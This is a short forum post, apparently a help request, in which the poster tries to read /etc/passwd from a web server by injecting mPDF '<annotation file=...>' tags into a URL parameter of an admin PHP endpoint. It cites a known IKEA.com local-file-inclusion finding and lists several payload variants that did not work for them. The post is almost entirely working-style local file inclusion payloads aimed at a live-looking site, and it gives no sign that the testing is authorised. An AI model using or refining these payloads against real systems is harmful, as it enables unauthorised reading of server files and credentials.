# trying to get the /etc/passwd with annotation file . cant get it to work

Tags: web, annotations, passwords, remote-access

I am trying to get /etc/password by using annotation file but cant get it to work .

https://theweb.site/admin/mpdf.php?user=admin<annotation file=”/etc/passwd” content=”/etc/passwd” icon=”Graph” title=”Attached File: /etc/passwd” pos-x=”195” />

<annotation file=\”/etc/passwd\” content=\”/etc/passwd\” icon=\”Graph\” title=\”Attached File: /etc/passwd\” pos-x=\”195\” />
this is the original form Local file inclusion at IKEA.com

and this is what i tryied :
<annotation file=”/etc/passwd” content=”/etc/passwd” icon=”Graph”
title=”Attached File:/etc/passwd” pos-x=”195” />

<annotation file=”/etc/passwd/” content=”/etc/passwd/” icon=”Graph” title=”Attached File: /etc/passwd/” pos-x=”195” />

<annotation file=” etc/passwd ” content=” /etc/passwd ” icon= ”Graph” title= ”Attached File: /etc/passwd ” pos-x=”195\” />

<annotation file=\”/etc/passwd\” content=\”/etc/passwd\” icon=\”Graph\” title=\”Attached File: /etc/passwd\” pos-x=\”195\” />

<annotation file=”etc/passwd ” content=”/etc/passwd” icon=”Graph” title=”Attached File: /etc/passwd” pos-x=”195” />